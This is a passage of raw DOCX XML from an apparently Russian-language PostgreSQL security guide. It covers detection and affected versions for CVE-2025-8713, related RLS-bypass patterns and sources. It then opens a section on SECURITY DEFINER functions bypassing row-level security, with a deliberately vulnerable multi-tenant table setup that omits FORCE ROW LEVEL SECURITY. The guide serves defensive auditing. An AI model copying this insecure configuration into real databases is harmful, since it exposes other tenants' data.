        <w:t>SELECT * FROM pg_operator WHERE oprrest &lt;&gt; 0 OR oprjoin &lt;&gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> joined to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для определения source функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD01F94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG version check</w:t>
      </w:r>
      <w:r>
        <w:t>: ≤ 17.5/16.9/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44586128" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-side audit</w:t>
      </w:r>
      <w:r>
        <w:t>: queries с unusual operator symbols (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@@@</w:t>
      </w:r>
      <w:r>
        <w:t>, custom multi-char operators) — flag для review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94270F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки до фиксов 14.08.2025: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479F" w14:paraId="2A798557" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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7AB10AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Major</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8AB15A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Уязвима до</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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66ACE4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4EDF3575"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FD2FE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.x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2272FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.5</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A1A90D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2428747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12AC42" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x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674940" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.9</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71FDF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="78291D79"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082E74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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EAE757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.13</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9CE38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="58D1D79B"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5C90B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.x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28635E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.18</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78F167" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2167ED3A"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493153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.x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F5F2B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.21</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6D9E89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0B90AC80"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047C80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>12.x</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28F757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EOL 14.11.2024</w:t>
            </w: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A5B153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет фикса (EOL до этого CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48365AD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL 13 объявлен EOL 13.11.2025; для production кластеров на 13.21 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>последний CVE</w:t>
      </w:r>
      <w:r>
        <w:t>, который оставляет их уязвимыми навсегда без upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684756EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE88C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 pg_stats_ext leak (CVE-2024-4317)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — related, оба касаются statistics leak. Граница: 3.8.6 — view permissions bypass (read через pg_stats_ext view); 3.17.4 — planning-phase custom operator bypass. Cross-ref важен — приложения часто имеют оба уязвимости одновременно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3138F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.1 / 3.17.2 / 3.17.3 / 3.17.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другие RLS-bypass vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A63484E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2 / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE через untrusted languages — alternative path для creating malicious estimator functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD99362" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Хронология 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст CVE 14.08.2025 batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7CF2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — REVOKE CREATE FROM PUBLIC на schemas, ограничение CREATE OPERATOR/FUNCTION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3AA25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A331B25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2025-8713 (когда опубликован) — https://www.postgresql.org/support/security/CVE-2025-8713/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A51BC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 17.6 Release Notes (Security Fixes) — https://www.postgresql.org/docs/release/17.6/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A278A1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   GBHackers article: «Critical PostgreSQL Flaws» — https://gbhackers.com/critical-postgresql-flaws/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA7F28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «System Catalog» / pg_statistic, pg_stats — https://www.postgresql.org/docs/current/view-pg-stats.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441D0EB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «CREATE OPERATOR» — https://www.postgresql.org/docs/current/sql-createoperator.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9DBD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Planner Statistics» — https://www.postgresql.org/docs/current/planner-stats.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002C541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pganalyze blog: «5mins of Postgres E141» (если охватывает 2025 batch) — https://pganalyze.com/blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455630C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R26 (sources/research.md, строки 400–405)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699CD76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CVE-2024-4317 (R17) — related earlier CVE для pg_stats_ext leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256BDDD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.17.5 SECURITY DEFINER функции и RLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36296C60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Классический mis-configuration без CVE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECURITY DEFINER функция, owner которой имеет RLS-bypass для целевой таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (по умолчанию — owner таблицы или superuser). Когда low-privileged user вызывает такую функцию, она исполняется под owner-context, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS не применяется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий получает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полный SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на таблицу, обойдя CREATE POLICY. Это не bug PostgreSQL, это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>documented behavior</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: RLS bypass для owner существует by design, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужно явно включать для blocking этого. Антипаттерн — массово использовать SECURITY DEFINER функции как «view-like accessors» к RLS-таблицам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без явного фильтра внутри функции по current_setting</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2F635B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>самый частый source RLS-bypass в production</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — намного чаще, чем CVE-based vectors. Любая SECURITY DEFINER функция, читающая RLS-protected таблицу, требует ручного review: применяет ли она policy самостоятельно?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B039B03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E8CCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-- Setup multi-tenant orders с RLS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4C2541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE app.orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563E22D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    id int PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAEE5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id int NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C274D57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    amount numeric,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACEB721" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754537D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0913CED6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE app.orders ENABLE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F294D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ВНИМАНИЕ: НЕТ FORCE ROW LEVEL SECURITY!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10453003" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F9B23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- RLS policy для tenant isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF6276" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19710D0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E90CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D5E396" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Owner таблицы: postgres (superuser) — by default bypass RLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1688C68A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- application_user — обычная application role:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183555D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SELECT, INSERT, UPDATE ON app.orders TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A7A9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
